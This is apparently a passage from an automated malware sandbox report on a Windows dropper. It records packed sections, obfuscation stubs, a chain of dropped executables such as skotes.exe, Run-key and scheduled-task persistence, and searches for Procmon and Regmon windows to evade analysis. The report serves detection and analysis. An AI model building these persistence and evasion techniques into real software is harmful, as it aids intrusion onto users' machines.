Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Unpacked PE file: 3.2.YQEN9A9QU4P1VROBPV5YS.exe.590000.0.unpack :EW;.rsrc:W;.idata :W;itokqeos:EW;vqtnthmp:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Unpacked PE file: 4.2.99Q4Y3O9GBOXYTDVM9GPHI.exe.520000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qodksccb:EW;reojqbkz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qodksccb:EW;reojqbkz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Unpacked PE file: 10.2.b76bb5cee7.exe.aa0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fozyxqhw:EW;gnsdcfju:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fozyxqhw:EW;gnsdcfju:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 11.2.skotes.exe.c70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qodksccb:EW;reojqbkz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qodksccb:EW;reojqbkz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Unpacked PE file: 29.2.b76bb5cee7.exe.aa0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fozyxqhw:EW;gnsdcfju:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fozyxqhw:EW;gnsdcfju:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Unpacked PE file: 30.2.U2242U1STHGPPKHG.exe.630000.0.unpack :EW;.rsrc:W;.idata :W;itokqeos:EW;vqtnthmp:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Unpacked PE file: 32.2.KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.4d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qodksccb:EW;reojqbkz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qodksccb:EW;reojqbkz:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: random[1].exe.5.dr Static PE information: real checksum: 0x2d49e9 should be: 0x2dfc29
Source: num[1].exe.5.dr Static PE information: real checksum: 0x0 should be: 0xdb9be
Source: num.exe.5.dr Static PE information: real checksum: 0x0 should be: 0xdb9be
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: real checksum: 0x1edc8f should be: 0x1ecca7
Source: U2242U1STHGPPKHG.exe.9.dr Static PE information: real checksum: 0x2a1f21 should be: 0x29ff4e
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: real checksum: 0x1edc8f should be: 0x1ecca7
Source: skotes.exe.4.dr Static PE information: real checksum: 0x1edc8f should be: 0x1ecca7
Source: efe6fe4127.exe.5.dr Static PE information: real checksum: 0x2d49e9 should be: 0x2dfc29
Source: file.exe Static PE information: real checksum: 0x2d49e9 should be: 0x2dfc29
Source: YQEN9A9QU4P1VROBPV5YS.exe.0.dr Static PE information: real checksum: 0x2a1f21 should be: 0x29ff4e
Source: random[1].exe0.5.dr Static PE information: real checksum: 0x215498 should be: 0x20f1cd
Source: b76bb5cee7.exe.5.dr Static PE information: real checksum: 0x215498 should be: 0x20f1cd
Source: 9XHYSBI0DT1C8ABJDSO.exe.12.dr Static PE information: real checksum: 0x2a1f21 should be: 0x29ff4e
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: iktxewek
Source: file.exe Static PE information: section name: nlvjxyrc
Source: file.exe Static PE information: section name: .taggant
Source: YQEN9A9QU4P1VROBPV5YS.exe.0.dr Static PE information: section name:
Source: YQEN9A9QU4P1VROBPV5YS.exe.0.dr Static PE information: section name: .idata
Source: YQEN9A9QU4P1VROBPV5YS.exe.0.dr Static PE information: section name: itokqeos
Source: YQEN9A9QU4P1VROBPV5YS.exe.0.dr Static PE information: section name: vqtnthmp
Source: YQEN9A9QU4P1VROBPV5YS.exe.0.dr Static PE information: section name: .taggant
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: section name:
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: section name: .idata
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: section name:
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: section name: qodksccb
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: section name: reojqbkz
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: .idata
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: qodksccb
Source: skotes.exe.4.dr Static PE information: section name: reojqbkz
Source: skotes.exe.4.dr Static PE information: section name: .taggant
Source: random[1].exe.5.dr Static PE information: section name:
Source: random[1].exe.5.dr Static PE information: section name: .idata
Source: random[1].exe.5.dr Static PE information: section name: iktxewek
Source: random[1].exe.5.dr Static PE information: section name: nlvjxyrc
Source: random[1].exe.5.dr Static PE information: section name: .taggant
Source: efe6fe4127.exe.5.dr Static PE information: section name:
Source: efe6fe4127.exe.5.dr Static PE information: section name: .idata
Source: efe6fe4127.exe.5.dr Static PE information: section name: iktxewek
Source: efe6fe4127.exe.5.dr Static PE information: section name: nlvjxyrc
Source: efe6fe4127.exe.5.dr Static PE information: section name: .taggant
Source: random[1].exe0.5.dr Static PE information: section name:
Source: random[1].exe0.5.dr Static PE information: section name: .rsrc
Source: random[1].exe0.5.dr Static PE information: section name: .idata
Source: random[1].exe0.5.dr Static PE information: section name:
Source: random[1].exe0.5.dr Static PE information: section name: fozyxqhw
Source: random[1].exe0.5.dr Static PE information: section name: gnsdcfju
Source: random[1].exe0.5.dr Static PE information: section name: .taggant
Source: b76bb5cee7.exe.5.dr Static PE information: section name:
Source: b76bb5cee7.exe.5.dr Static PE information: section name: .rsrc
Source: b76bb5cee7.exe.5.dr Static PE information: section name: .idata
Source: b76bb5cee7.exe.5.dr Static PE information: section name:
Source: b76bb5cee7.exe.5.dr Static PE information: section name: fozyxqhw
Source: b76bb5cee7.exe.5.dr Static PE information: section name: gnsdcfju
Source: b76bb5cee7.exe.5.dr Static PE information: section name: .taggant
Source: U2242U1STHGPPKHG.exe.9.dr Static PE information: section name:
Source: U2242U1STHGPPKHG.exe.9.dr Static PE information: section name: .idata
Source: U2242U1STHGPPKHG.exe.9.dr Static PE information: section name: itokqeos
Source: U2242U1STHGPPKHG.exe.9.dr Static PE information: section name: vqtnthmp
Source: U2242U1STHGPPKHG.exe.9.dr Static PE information: section name: .taggant
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: section name:
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: section name: .idata
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: section name:
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: section name: qodksccb
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: section name: reojqbkz
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: section name: .taggant
Source: 9XHYSBI0DT1C8ABJDSO.exe.12.dr Static PE information: section name:
Source: 9XHYSBI0DT1C8ABJDSO.exe.12.dr Static PE information: section name: .idata
Source: 9XHYSBI0DT1C8ABJDSO.exe.12.dr Static PE information: section name: itokqeos
Source: 9XHYSBI0DT1C8ABJDSO.exe.12.dr Static PE information: section name: vqtnthmp
Source: 9XHYSBI0DT1C8ABJDSO.exe.12.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A76018 push esi; iretd 0_3_00A76282
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A75000 push esi; iretd 0_3_00A76282
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A77161 push esp; ret 0_3_00A772AA
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A77161 push esp; ret 0_3_00A772AA
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A76441 push edi; retf 0_3_00A76A62
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A76018 push esi; iretd 0_3_00A76282
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A75000 push esi; iretd 0_3_00A76282
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A77161 push esp; ret 0_3_00A772AA
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A77161 push esp; ret 0_3_00A772AA
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A76441 push edi; retf 0_3_00A76A62
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A1AB0F push ss; ret 0_3_00A1ACAA
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A155E0 push ds; retf 0_3_00A155E2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A152C8 pushad ; ret 0_3_00A152C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A76018 push esi; iretd 0_3_00A76282
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A75000 push esi; iretd 0_3_00A76282
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A77161 push esp; ret 0_3_00A772AA
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A77161 push esp; ret 0_3_00A772AA
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A76441 push edi; retf 0_3_00A76A62
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_052C9003 push cs; retf 0_3_052C9004
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A75000 push esi; iretd 0_3_00A76282
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A77161 push esp; ret 0_3_00A772AA
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A77161 push esp; ret 0_3_00A772AA
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0059E601 push edx; mov dword ptr [esp], 3D0DB58Ch 3_2_0059F3DE
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0059E601 push ebp; mov dword ptr [esp], 7BFBFE88h 3_2_0059F3E9
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0070CE97 push ecx; mov dword ptr [esp], 7BFE3D07h 3_2_0070CEE9
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0070CE97 push edi; mov dword ptr [esp], 75E25A00h 3_2_0070CF1C
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0059E725 push 07789B14h; mov dword ptr [esp], ebp 3_2_0059EB8D
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0071B07C push eax; mov dword ptr [esp], ecx 3_2_0071B495
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0071906E push edi; mov dword ptr [esp], esi 3_2_00719072
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_00709855 push 13B6B500h; mov dword ptr [esp], edx 3_2_0070986F
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0059C069 push ebp; mov dword ptr [esp], edx 3_2_0059C06A
Source: file.exe Static PE information: section name: entropy: 7.970164933759343
Source: YQEN9A9QU4P1VROBPV5YS.exe.0.dr Static PE information: section name: entropy: 7.793826982702039
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: section name: entropy: 7.980350469775883
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: section name: qodksccb entropy: 7.953744309551374
Source: skotes.exe.4.dr Static PE information: section name: entropy: 7.980350469775883
Source: skotes.exe.4.dr Static PE information: section name: qodksccb entropy: 7.953744309551374
Source: random[1].exe.5.dr Static PE information: section name: entropy: 7.970164933759343
Source: efe6fe4127.exe.5.dr Static PE information: section name: entropy: 7.970164933759343
Source: random[1].exe0.5.dr Static PE information: section name: fozyxqhw entropy: 7.952608283646461
Source: b76bb5cee7.exe.5.dr Static PE information: section name: fozyxqhw entropy: 7.952608283646461
Source: U2242U1STHGPPKHG.exe.9.dr Static PE information: section name: entropy: 7.793826982702039
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: section name: entropy: 7.980350469775883
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: section name: qodksccb entropy: 7.953744309551374
Source: 9XHYSBI0DT1C8ABJDSO.exe.12.dr Static PE information: section name: entropy: 7.793826982702039
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File created: C:\Users\user\AppData\Local\Temp\9XHYSBI0DT1C8ABJDSO.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File created: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File created: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run deecb7b612.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b76bb5cee7.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run efe6fe4127.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run efe6fe4127.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run efe6fe4127.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b76bb5cee7.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b76bb5cee7.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run deecb7b612.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run deecb7b612.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
